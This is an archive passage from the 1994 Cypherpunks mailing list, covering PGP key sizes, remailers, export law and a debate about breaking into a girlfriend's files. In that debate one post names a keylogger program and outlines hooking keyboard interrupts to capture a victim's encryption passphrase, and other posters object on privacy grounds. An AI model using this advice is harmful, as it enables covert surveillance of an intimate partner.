In the future, I expect > that ordinary citizens using the Internet will want to inform > themselves about who's behind all of those slick web pages. This gets right down to one of the fundamental differences between Usenet news and the WWW. The Web is essentially a broadcast model for information exchange, even though everyone can publish their own Web page. News & mailing lists, OTOH, give everyone involved an opportunity to respond and point out stuff that is complete bullshit. Until you can hang responses off of Web pages, it will never give the value of the newsgroups and mailing lists, despite all the fancy fonts and glitzy graphics on the Web pages. --Paul J. Ste. Marie From entropy at IntNet.net Sat Dec 24 07:15:17 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sat, 24 Dec 94 07:15:17 PST Subject: reading someone's files In-Reply-To: <9412232026.AA22580@webster.imsi.com> Message-ID: > I'm surprised that no one has given the obvious answers on this > topic. If you have physical access to someone's machine, it is trivial > to find out what their encryption keys are. After all, the victim > types into the machine regularly -- recording all their keystrokes is > not a difficult matter at all. Indeed. Archie for DEPL.ZIP or DEPLSRC.ZIP - the program is called Delam's Elite Password Leecher (sic) and will do exactly this task. Also you could write a 5 minute TSR in the language of your choice to hook interrupt 9 and write to a logfile; examples of this are all over the net. If you must, post to alt.2600 asking for one, and 18,000 k0de k1ddies will mail you back uu'd copies. -jon ( --------[ Jonathan D. 
Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From grendel at netaxs.com Sat Dec 24 08:05:15 1994 From: grendel at netaxs.com (Michael Handler) Date: Sat, 24 Dec 94 08:05:15 PST Subject: DDJ editorial In-Reply-To: <199412241236.EAA13217@netcom14.netcom.com> Message-ID: On Sat, 24 Dec 1994, Harry Bartholomew wrote: > I think this sentence was missing a NOT: > > If, as some claim and RSA disputes, the > code was reverse-engineered from object files in off-the-shelf software, > then the law was probably broken - unless RSA and other vendors decide to > test the strength of highly questionable and likely unenforceable > shrink-wrap licenses that try to prohibit disassembly/decompilation. No, that's correct as printed. -- Michael Handler Philadelphia, PA Civil Liberty Through Complex Mathematics s.s.y.g-l-b co-moderator You're only as elegant as your actions let you be From Piete.Brooks at cl.cam.ac.uk Sat Dec 24 08:23:41 1994 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Sat, 24 Dec 94 08:23:41 PST Subject: FRAUD: Progress & Freedom on the Web-Frontier? In-Reply-To: Message-ID: <"swan.cl.cam.:131990:941224162332"@cl.cam.ac.uk> How do you feel about it being tweaked ? e.g. the TOC should include all chunks, including basic use, etc. From eric at remailer.net Sat Dec 24 08:50:02 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 24 Dec 94 08:50:02 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412241111.DAA01099@unix.ka9q.ampr.org> Message-ID: <199412241747.JAA21620@largo.remailer.net> From: Phil Karn Isn't it common practice to pad out a plaintext block with random garbage to the size of the modulus before you RSA-encrypt it? [...] Wouldn't this thwart the kind of attack you describe? 
It would, but not having ever applied for a 15-day CJ, I can't speak to the details of what the implementations actually do. Perhaps they permit random padding, perhaps not. It's certainly possible that the padding is required to be fixed; that's certainly in the style of NSA 'requests' for 'features'. Can anybody here shed some light on the subject? Eric From arromdee at blaze.cs.jhu.edu Sat Dec 24 12:06:58 1994 From: arromdee at blaze.cs.jhu.edu (Ken Arromdee) Date: Sat, 24 Dec 94 12:06:58 PST Subject: Breaking into girlfriend's files Message-ID: <9412242006.AA11428@toad.com> Black Unicorn: >1> All potentially damaging information, by virtue of its potential >"wrongful use" shall be banned. >2> All information clearly going to be used for the "wrong purposes" >shall be restricted. >The result in 1>, I think is quite clear. >The result in 2>, requires some ONE, some GROUP to decide what is and is >not A> "clearly going to be used for," B> "the wrong purposes." ... >You end up with either a cut throat thought police regime, or slightly >less offensive paternalistic censorship. You choose, what is it you want >to have? Any individual has the right to decide what information to give out. If that means the individual has to judge someone else's purposes, then so be it. The individual may even try to persuade others not to give out the information. It only becomes a problem if he's trying to use force--to keep others who _do_ want to reveal the information, from revealing it. This is _the_ difference between the current situation, and real police state censorship; censorship prevents someone from speaking who wants to speak; it doesn't merely mean that the government itself won't speak to you. -- Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu) "No boom today. Boom tomorrow, there's always a boom tomorrow." 
--Ivanova From klp at epx.cis.umn.edu Sat Dec 24 13:01:55 1994 From: klp at epx.cis.umn.edu (klp at epx.cis.umn.edu) Date: Sat, 24 Dec 94 13:01:55 PST Subject: Breaking into girlfriends files. Message-ID: <0012efc8c39013387@epx.cis.umn.edu> Oddly enough, I'm on the other end of this situation right now with someone I know. The basic facts are this person keeps a journal, until recently on paper. Her husband got ahold of it and based on some stuff she had written decided to cause a big fuss (not really willing to go into the whole details, it's a loooong story). So she burned the journal, and was bummed that she could no longer keep one for fear of a repeat of the situation. Knowing she has a macintosh at home, I mentioned PGP to her, and am in the process of getting her set up with a copy. Of course I'm informing her of the limitations, and such, so that she can take precautions so that what she wishes to keep private can remain private. Another crypto convert? I don't know. But I think she'll be ahead of 98% of the population in that she has a tool to keep her privacy, and she's fully aware of what it is, and the limitations. And that's not a bad day's work for this kid :) -- Kevin Prigge internet: klp at epx.cis.umn.edu CIS Consultant MaBellNet: (612)626-0001 Computer & Information Services SneakerNet: 152 Lauderdale From david.lloyd-jones at canrem.com Sat Dec 24 13:23:29 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Sat, 24 Dec 94 13:23:29 PST Subject: EXPORT CONTROLS ON RC In-Reply-To: <199412241744.JAA21614@largo.remailer.net> Message-ID: <60.18015.6525.0C1C590D@canrem.com> EH+The commerce clause applies to Congress, not the executive branch, of +which the State Dept is part. Bzzzt, Eric. The Constitution applies to the whole shootin' match. Congress, Executive, States, agencies, CIA, you name it. -dlj. 
david.lloyd-jones at canrem.com * 1st 1.11 #3818 * #include From m5 at vail.tivoli.com Sat Dec 24 14:16:16 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Sat, 24 Dec 94 14:16:16 PST Subject: EXPORT CONTROLS ON RC In-Reply-To: <199412241744.JAA21614@largo.remailer.net> Message-ID: <9412242216.AA21275@vail.tivoli.com> David Lloyd-Jones writes: > EH+The commerce clause applies to Congress, not the executive > +branch, of which the State Dept is part. > > Bzzzt, Eric. The Constitution applies to the whole shootin' match. > Congress, Executive, States, agencies, CIA, you name it. I think you should read the Constitution more carefully. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From blancw at pylon.com Sat Dec 24 19:29:08 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Sat, 24 Dec 94 19:29:08 PST Subject: To Cpunks EveryWhere Message-ID: <199412250329.TAA25229@deepthought.pylon.com> {000} [[[[[[[[[[]]]]]]]]]]]]]]] Q=%=QAtwhDbN/799e763=%=ho PiiE/////iRWQfoVPmME6fMYlU/////luLonSm mHk8/////D\\\\\Y0j4udH2oqvd6V/////gsN\\\\\bQeFC r3Lt/////25wSZ\\\\\lQ8BAXQw/////wIxBaxEM\\\\\ER9o 969/////XgnnoKybR\\\\\ +Zfli/////drRyt40MIkg1/Z5\\\\\Lg02 Ct7iHDbjkcn+!MerryChristmasCypherpunks!+3BF34RD d0+ezN5NM+2v4P5+&Tim+&+LD,too+GJ/lxi+exc6+C/m BrDqwa((@))((@0nGwiq((@))((@))XjrxlQ((@))((@))m suq((@))OI2l((@KSzy((@))0+((@))ptx((@))JiF((@) @))O+DcU((@))((@))VAgU((@))((@))6I8ZrPn \3xjsTLiUx((@))Mkxko/lnIR((@))oy9T42/ \eXORJOjaj4P5LRbYeRm2Ve8O/ \u830e3zt+b4Tmj7fe3u/ \ \VYVYVYVYV/ / ^*^*^*^*^ +*+*+ :: : . .. Blanc From an169306 at anon.penet.fi Sun Dec 25 03:22:09 1994 From: an169306 at anon.penet.fi (an169306 at anon.penet.fi) Date: Sun, 25 Dec 94 03:22:09 PST Subject: A Secure Christmas Message-ID: <9412251056.AA03743@anon.penet.fi> Here is to everyone having a cryptographically secure Christmas! 
BTW: PGP 2.6.2 now gives 2047 bit keys, a nice present from Derek and the other underpaid, overworked PGP coders. ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From ddt at lsd.com Sun Dec 25 05:25:21 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sun, 25 Dec 94 05:25:21 PST Subject: PSWD: "The Girlfriend's Opinion" Message-ID: At 8:28 pm 12/23/94, Black Unicorn wrote: >Who the hell are you to define the position of cypherpunks? >Who the hell are any of us to do this? Both interesting questions... and self-cancelling ones. As far as I know, Cypherpunks define their own personal positions and don't impose theirs on any one else, as you yourself seem to have done, Uni. Your argument, much like your "standard" is somewhat suspect in my view. Regarding your language: please tone it down a little? Rely less on ad hominem flames and the word "shit" and more on the strength of your arguments and I'd be more inclined to respect your opinions. Once I pick through your invective, you "seem" to have a point, but you really do go on a bit, making it a lot of work... are you sober as you write these things? On the topic: let me relay an interesting little tidbit I heard recently on radio (Fresh Air/NPR): the forensic psychiatrist who interviewed Jeffery Dhaumer (sp?) noted that he declines in his book(s) to describe the precise methods utilized by the killers he investigates in his book, because he feels that this will provide specific information directly to other psychopaths on how to be more effective in committing horrible crimes and eluding law enforcement. 
I think this rather closely parallels the posting of specific information on how to compromise the security of systems. Personally, I support his practice: while he does a very good job of describing things so that you can understand _why_ a killer did his deeds and possibly something of _how_ so that _you_ can avoid being killed by someone trying the same things, he doesn't compromise his responsibility as a physician. An interesting parallel. Privacy is Privacy, even if it's your intimate friend's privacy. Just because someone trusts you, it doesn't give you any rights to their personal data. I've had supposed "friends" try to break into my personal files before, so I wouldn't presume to pontificate on who deserves more privacy: everyone does. The free flow of information on system security is important, but when it sacrifices someone's privacy. If you intend to post information on how a system can be compromised, it seems to me that the responsible thing to do (as a cypherpunk or a physician) is to first notify the sysadmin or password-owner so as to make sure they've been able to close their doors, and THEN post the info to others judiciously using only enough detail as is necessary for educational purposes (like the doctor above). Uni, you don't work at a nuclear site, do you? ;) Ahem. Let's move on... __________________________ BTW, a collective "thanks" to the few of you who have so far sent in Q&A material for the Beginner's PGP-FAQ. By and large, they are all helpful suggestions. My only feedback for now is to remind you all that this has to be VERY basic conceptual material. As the rest of you (hopefully) send me stuff, please keep this in mind. Imagine you're explaining WHY crypto to a five-year-old, and HOW PGP to a six-year-old. :) We really have to aim low on this one. I'll be working on this for a while and will post a draft for you all to review as soon as it's ready. 
dave ___________________________________________________________________________ "Rudeness is the penultimate refuge of the Incompetent; violence, the last" From rah at shipwright.com Sun Dec 25 05:26:40 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 25 Dec 94 05:26:40 PST Subject: To Cpunks EveryWhere Message-ID: <199412251326.IAA25534@zork.tiac.net> At 7:29 PM 12/24/94 -0800, blancw at pylon.com wrote: > Ct7iHDbjkcn+!MerryChristmasCypherpunks!+3BF34RD Yeah, what she said. ;-) (Holiday) Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From ddt at lsd.com Sun Dec 25 06:07:03 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sun, 25 Dec 94 06:07:03 PST Subject: No privacy with DigiCash Message-ID: At 6:39 am 12/24/94, Jonathan Cooper wrote: >> one of the big selling points of DigiCash. Is there something I am >> overlooking, some way to buy things privately with DigiCash? > > I don't think so. It appears that the initial implementation of >DigiCash works exactly that way [based on what I've read on their W3 >server]. Of course, I could tell you more exactly had they replied to >any of my four separate attempts to try it out .. Interesting. I too have made four requests and still not received any software. Can you say "vapor?" dave _________________________________________________________________________ "You can put your shoes in the oven, but that don't make 'em biscuits." From lce at wwa.com Sun Dec 25 13:22:34 1994 From: lce at wwa.com (Larry E) Date: Sun, 25 Dec 94 13:22:34 PST Subject: 2048-bit key...I'm leery Message-ID: <63U$kG9s18wO075yn@wwa.com> Ok, call me a skeptic. I made two tries at generating a 2048-bit key on my 33-MHZ 386 machine using PGP 2.6.2. 
Yes, I know I only get 2047 bits, but that's not what bothers me. What bothers me is the first key generation only took thirty seconds, and the second one under ten minutes. Two questions: 1) Why such disparity in the two times? 2) Can the key generation possibly be done on my machine that quickly? I was expecting it to take at least several hours, based on what I've been reading in the cryptology groups. From entropy at IntNet.net Sun Dec 25 13:43:14 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 25 Dec 94 13:43:14 PST Subject: Moving from 1024-bit -> 2048-bit key. In-Reply-To: <63U$kG9s18wO075yn@wwa.com> Message-ID: Once I've generated a 2048-bit key, how can I update my key on the keyservers? -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From jcorgan at scruznet.com Sun Dec 25 14:03:03 1994 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Sun, 25 Dec 94 14:03:03 PST Subject: 2048-bit key...I'm leery Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >2) Can the key generation possibly be done on my machine that >quickly? I was expecting it to take at least several hours based on >what I've been reading in the cryptology groups. My first try took about twenty minutes on a 486/50. Second try was about 15 minutes on a 486/66. 
======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at scruznet.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From warlord at MIT.EDU Sun Dec 25 14:12:12 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 25 Dec 94 14:12:12 PST Subject: 2048-bit key...I'm leery In-Reply-To: <63U$kG9s18wO075yn@wwa.com> Message-ID: <9412252212.AA06148@toxicwaste.media.mit.edu> For the first key you were just plain lucky. Most likely the first or second number you tried happened to be a prime, so it found its p and q fairly easily. That's all. The 10 minutes is much closer to the average expected time. But the probability is linear between the two primes you choose, so you happened to choose _just before_ a prime. Lucky you!
-derek From warlord at MIT.EDU Sun Dec 25 14:12:59 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 25 Dec 94 14:12:59 PST Subject: Moving from 1024-bit -> 2048-bit key. In-Reply-To: Message-ID: <9412252213.AA06153@toxicwaste.media.mit.edu> You don't "update" your key, you add your new one, so now you have two keys on the keyservers; your old one and your new one. -derek From plutt at mtek.chalmers.se Sun Dec 25 17:06:20 1994 From: plutt at mtek.chalmers.se (Pelle Johansson) Date: Sun, 25 Dec 94 17:06:20 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: Is Lance back "creating" pretty flamewars? He must be amused by the fact that it's really easy. -- Pelle Johansson, Norra Krokslättsgatan 15B | plutt at mtek.chalmers.se 41264 Göteborg, Sweden. | Voice +46-31-358598 anarchrist at igormud, ny.mtek.chalmers.se 1701 | Beeper 0740-116326 "Destruction is not bad. You have to destruct to build." - B. Bargeld. From ddt at lsd.com Mon Dec 26 05:49:11 1994 From: ddt at lsd.com (Dave Del Torto) Date: Mon, 26 Dec 94 05:49:11 PST Subject: good blaze quote Message-ID: At 9:41 pm 11/9/94, Matt Blaze wrote: >Cypherpunks write code, and design protocols, and analyze ciphers, and >assess risks, and write articles, and attend conferences, and lobby >Congress, and in general look at the world with a critical eye. I was just going through some old mail and found this nice quote from one of our own. BTW, thanks for those pointers to Rivest's RC5 materials...I'm just getting around to them but they're very educational. dave __________________________________________________________ I have a flawless philosophic/scientific model of reality. Unfortunately, it's actual size.
From raph at CS.Berkeley.EDU Mon Dec 26 06:50:09 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 26 Dec 94 06:50:09 PST Subject: List of reliable remailers Message-ID: <199412261450.GAA25182@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"jpunix"} = " cpunk pgp hash latent cut post ek"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. 
post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; $remailer{"q"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 26 Dec 94 6:00:25 PST remailer email address history latency uptime ----------------------------------------------------------------------- alumni hal at alumni.caltech.edu +*********** 3:37 99.99% usura usura at replay.com +*********** 4:41 99.99% nately remailer at nately.ucsd.edu ++++++++++++ 45:12 99.99% portal hfinney at shell.portal.com *******#*#*# 1:52 99.99% penet anon at anon.penet.fi +*********** 22:14 99.99% mix mixmaster at nately.ucsd.edu ++++++-+++++ 55:05 99.99% ideath remailer at ideath.goldenbear.com +******++* + 1:33:50 99.99% vox remail at vox.xs4all.nl --...-..-..- 15:24:27 99.99% rahul homer at rahul.net ****-----*** 38:39 99.90% soda remailer at csua.berkeley.edu ........-. 9:26:00 99.88% desert remail at desert.xs4all.nl --.-...---- 14:54:03 99.99% q q at c2.org +--++- -- 7:56:13 99.51% c2 remail at c2.org ++-++ -- 6:16:43 98.96% xs4all remailer at xs4all.nl +**** * **** 4:56 98.85% flame tomaz at flame.sinet.org **+* +*** * 6:03 97.30% rebma remailer at rebma.mn.org ..-.------*+ 10:22:19 97.32% jpunix remailer at jpunix.com **+* +*** * 5:38 97.26% bsu-cs nowhere at bsu-cs.bsu.edu *******+* - 8:30:01 93.77% extropia remail at extropia.wimsey.com _ .+.-+* 32:24:15 81.95% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. 
eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From grmorgan at freenet.vcu.edu Mon Dec 26 11:07:25 1994 From: grmorgan at freenet.vcu.edu (Greg Morgan) Date: Mon, 26 Dec 94 11:07:25 PST Subject: Moving from 1024-bit -> 2048-bit key. Message-ID: <9412261907.AA10983@freenet.vcu.edu> > >Once I've generated a 2048-bit key, how can I update my key on the >keyservers? > First you need to generate a key revocation for your old key and post that to the servers. Then just email your new key to the server. I think the command to revoke a key is PGP -kr but check the manual/help files to be sure... I haven't had to revoke a key yet so that's why I'm a little fuzzy. Later... Greg Morgan -- ----------------------------------------------------------------------------- Greg Morgan | "I dunno Brain, me and Pipi From adam at bwh.harvard.edu Mon Dec 26 12:14:24 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 26 Dec 94 12:14:24 PST Subject: Moving from 1024-bit -> 2048-bit key. 
In-Reply-To: <9412261907.AA10983@freenet.vcu.edu> Message-ID: <199412261959.OAA17978@bwh.harvard.edu> Why revoke the old one? If I want to send a message I don't think needs 2048 RSA bits of security, why bother with it? I have little doubt the FBI would get your key from your computer at 1024 bits. Thus, the effort needed to compromise a key does not change as one moves from a 1024 to a 2048 bit key. Threat models are really helpful. They become more helpful as one accurately assesses one's enemies. Ronald Kessler wrote a book called The FBI. It's a fairly evenhanded examination of the post-Hoover bureau. He does gloss over DT & Waco; they occurred as he was finishing the book. Reading it will give you good insight into the way the FBI, and its agents, work. (0-671-78657-1) Adam | >Once I've generated a 2048-bit key, how can I update my key on the | >keyservers? | > | | First you need to generate a key revocation for your old key | and post that to the servers. Then just email your new key to | the server. -- "It is seldom that liberty of any kind is lost all at once." -Hume From an169306 at anon.penet.fi Mon Dec 26 13:34:07 1994 From: an169306 at anon.penet.fi (an169306 at anon.penet.fi) Date: Mon, 26 Dec 94 13:34:07 PST Subject: Moving from 1024-bit -> 2048-bit key. Message-ID: <9412262107.AA03674@anon.penet.fi> I am wondering if going to 2048 bits is worth it or not. After a certain point, it doesn't matter whether it takes 200 quadrillion years or 200 decillion years to factor a key, it will be a long time before it's factored ;-). Perhaps keep your 1024 bit key, unless you want to expire it and generate a new one. (I did that, expired two keys, replaced them with a 2048 bit key, but realize that a 2048 bit key takes somewhat more time and processing power to do the usual PGP hijinks with. I probably would be better off just using a 1500 bit key, but too late now...)
Just remember (so your web of trust stays intact) to sign your new key and use your new key to sign your old one before revoking the old key. This confirms that it IS a new key, rather than someone trying to spoof you. Also, keep a backup of your public and secret keyrings before revoking the old key. This is just common sense. Make sure your backup is secure, though. (I PKZIP my PGP stuff, encrypt it several times with conventional key encryption, wnstorm it, THEN lastly use Norton Diskreet with a password that is different from all the rest. If Diskreet is not secure, PGP and wnstorm are, so I don't really care if Diskreet has holes in it or not. It's just there to 'spice things up' for anyone trying to crack the backup, which is stored in a place any party I authorize or I can easily get at it. If anyone sees something weak about this, E-mail me... ;-) The main thing is not to go keysize crazy which I did, as you do pay a performance penalty for those huge keys, and make sure that your other avenues of attack are defended against. (As soon as I can, I am buying a portable 486 or Pentium, since my main weakness is a 'black bag' attack using a good keystroke monitor or a hardware bug, then a simple copy of the secring file when I mount my SecureDrive partition and the Stacker partition inside of that to access my PGP stuff.) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi.
From an109574 at anon.penet.fi Mon Dec 26 14:01:08 1994 From: an109574 at anon.penet.fi (an109574 at anon.penet.fi) Date: Mon, 26 Dec 94 14:01:08 PST Subject: voice encryption for portable PCs Message-ID: <9412262136.AA14518@anon.penet.fi> One of the problems with Philip Zimmermann's very worthy voice encryption project is the lack of support for PC laptops, notebooks and palmtops that lack soundcards. If anyone involved in this project is listening, please consider creating a version that will work well with the PCMCIA "Wavejammer" card or some other peripheral soundcard substitute. Cogon Electronics Inc., as has been discussed in this group, markets a voice encryption program called Aquafone that employs Diffie-Hellman+triple DES. The current version uses a push-to-talk feature like a CB radio, but the company plans a fully duplexed version in March. Like the Zimmermann project, the Aquafone uses a standard soundcard. The company reports mixed results using Wavejammer cards. The audio quality afforded by the Wavejammer is noticeably inferior to that of a soundcard. Seems the audio digitization algorithms would have to be tweaked to optimize the fidelity using the Wavejammer. BTW, please don't misconstrue this as an advertisement for Wavejammer or Aquafone. I fully expect Phil's voice encryption software to become the de facto telephonic standard just as PGP became the Internet standard. Cogon's Aquafone, while commendable, has the disadvantage of employing DES. I presume Phil will select a more resilient conventional algorithm. Cogon also lacks Phil's cachet as certified by his fans at Justice and Customs. And, of course, the Zimmermann software will be freeware. Likewise, I mention Wavejammer because that is the only PCMCIA substitute for a soundcard with which I am familiar. 
If someone can suggest other solutions to the sound card deficiency in PC laptops and notebooks -- short of buying a Mac or restricting one's selection to the few PC portables that have internal soundcards -- please do. I don't regularly monitor this group, so I would greatly appreciate any replies by e-mail. This is an important problem to solve. After cryptanalysis, traffic analysis is the biggest threat to secure telephony. A readily portable PC armed with Phil's voice encryption program represents a real dilemma for traffic analysts since one or both targeted parties are no longer tied to specific telephones. I am neither a telecommunications expert nor a programmer. I am a civil liberties activist. Periodically, from the safety of the United States, I must communicate with people whose courage and idealism puts them in jeopardy of hostile parties. PGP is quite popular in such circles. As you might expect, Phil's voice encryption software is awaited with equal enthusiasm. ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From bryce at cybernet.co.nz Mon Dec 26 19:15:42 1994 From: bryce at cybernet.co.nz (Bryce Boland) Date: Mon, 26 Dec 94 19:15:42 PST Subject: Moving from 1024-bit -> 2048-bit key. Message-ID: >Just remember (so your web of trust stays intact) to sign your new key >and use your new key to sign your old one before revoking the old key. >This confirms that it IS a new key, rather than someone trying to >spoof you. You would want to sign your new key with your old key wouldn't you? Anyone can add a signature to your old key, but only you can add your (old key's) signature to a new key. 
I agree that signing your old key with your new key is probably a good idea, as it shows that the owners of the key (the same person) trust that the keys belong to who they say they are. ------------------------------------------------------------------------------- Bryce Boland Finger for PGP Public Key http://cybernet.co.nz/home/bryce/www/home.html From crawford at scruznet.com Mon Dec 26 19:28:41 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Mon, 26 Dec 94 19:28:41 PST Subject: PGP at MacWorld Expo? Message-ID: <199412270328.TAA24759@scruz.net> The MacWorld Expo is coming up soon in San Francisco, I believe from the 4th through the 7th of January. There must be _someone_ on this list who works for a company or user group that will be exhibiting (I know for sure the Berkeley Macintosh User's Group always exhibits, as does the Boston Computer Society). Do the world a favor. Distribute PGP from your booth. This being the MacWorld Expo, you'll need mostly Mac disks, but you would want to have some Unix and DOS disks on hand as well. Have flyers about the Digital Telephony Bill, to clue in the legislatively impaired. Imagine what a crowd you'll draw to your booth with a sign reading "Unbreakable encryption software - just $3 a disk". You might even make headlines in the trade rags or the SF newspapers. Certainly BMUG and BCS already have the "infrastructure" to sell freeware disks. But any of your companies out there would do well to sell freeware disks too. I understand, from my own experience of working at MacWorld (no, I won't be exhibiting...), that one of the biggest objections to this will be simply dealing with getting the disks duped and labeled, getting them to the show floor, and dealing with the large number of people who will be purchasing the disks and needing you to make change. This could be no small amount of impact on your booth operations. 
Another option is to offer PGP free with any purchase of your regular product, or to just distribute flyers about the DT bill with instructions for obtaining PGP from the Internet and online services. Regards, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From adam at bwh.harvard.edu Mon Dec 26 20:19:36 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 26 Dec 94 20:19:36 PST Subject: Milton on CSPAN Message-ID: <199412270419.XAA20160@bwh.harvard.edu> Got this, thought there might be interest. | if you have cable, Milton Friedman will be discussing Hayek on CSPAN | (I'm not sure whether I or II, I think I) this Wednesday at 8. From dmandl at bear.com Tue Dec 27 07:08:31 1994 From: dmandl at bear.com (dmandl at bear.com) Date: Tue, 27 Dec 94 07:08:31 PST Subject: Breaking into girlfriend's files Message-ID: <9412271452.AA23162@yeti.bsnet> Black Unicorn writes: > I guess I suffered from the silly idea that as a whole, the members of > the list would not put short term morality before the long term goal. Do me a favor, Uni: I want to assassinate you and all the other members of your family. Could you send me some powerful handguns and silencers? Oh, and while you're at it, give me all of your addresses and precise travel schedules for the next two weeks. As an "amoralist," I'm sure you won't put short term morality before my long-term goal. Thanks. > It seems there are those who disagree with me. I would offer the > following: While it may be that Joe Break-Into-Girlfriend's-Files may or > may not be justified, that is not ours to judge. I'll judge what I want to, OK? What are you trying to do, _coerce_ me into giving information to someone that I don't want to? > It is simply for the > crypto non-challenged to comment on the security or lack thereof of a > given system. Hmm, sounds like you're telling us what to do. And defining what "we" are, to boot. 
